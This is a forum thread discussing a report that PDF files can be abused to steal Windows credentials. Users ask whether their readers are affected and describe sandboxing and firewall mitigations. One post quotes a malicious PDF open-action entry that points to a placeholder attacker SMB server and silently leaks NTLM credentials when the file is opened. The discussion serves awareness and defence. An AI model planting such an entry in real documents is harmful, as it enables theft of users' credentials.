PDF Files Can Be Abused to Steal Windows Credentials

Discussion in 'other security issues & news' started by mood, Apr 27, 2018.

  1. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    9,457
    PDF Files Can Be Abused to Steal Windows Credentials
    April 27, 2018
    https://www.bleepingcomputer.com/news/security/pdf-files-can-be-abused-to-steal-windows-credentials/
     
  2. mary7

    mary7 Registered Member

    Joined:
    Oct 17, 2017
    Posts:
    53
    Location:
    Italy
    I use Sumatra Pdf it is also vulnerable?
     
  3. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    10,313
    Location:
    .
    I would also like know if it works if scripting is disabled in PDF Viewer.
    If program doesn't need network connection, blocking it in FW would also help.
     
  4. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    9,457
    It is not triggered by Javascript.
    The pdf file is modified (malicious entry is injected) and by opening of the pdf-file the action is triggered..
    Code:
    % **** malicious entry ****
    /AA <<
      /O <<
         /F (\\\\ <attacker_smb_server> \\ <dummy_file>)
         /D [ 0 /Fit ]
         /S /GotoE
       >>
    >>
    % *****
    
     
  5. PrinceYann

    PrinceYann Registered Member

    Joined:
    Nov 29, 2015
    Posts:
    37
    I bet machine name and user name can leak via DNS even if NTLM SSO is disabled.
     
  6. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    4,958
    Location:
    Nicaragua
    I think the way I open PDF files is pretty safe. Always sandboxed. When I open a PDF while browsing, the PDF file runs in my Firefox sandbox out of the browser, PDF files don't run within Firefox so cant use Firefox as a vehicle to phone home. Foxit, my PDF reader is not allowed access to the internet. And when I open PDF files from the hard drive, PDF files runs in a dedicated sandbox where only Foxit is allowed to run and all programs are forbidden internet access. Thats secure.

    Bo
     
  7. wolfrun

    wolfrun Registered Member

    Joined:
    Jul 26, 2009
    Posts:
    592
    Location:
    Canada
    Same as you Bo. Only I use SumatraPDF as the only difference.
     
Loading...
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.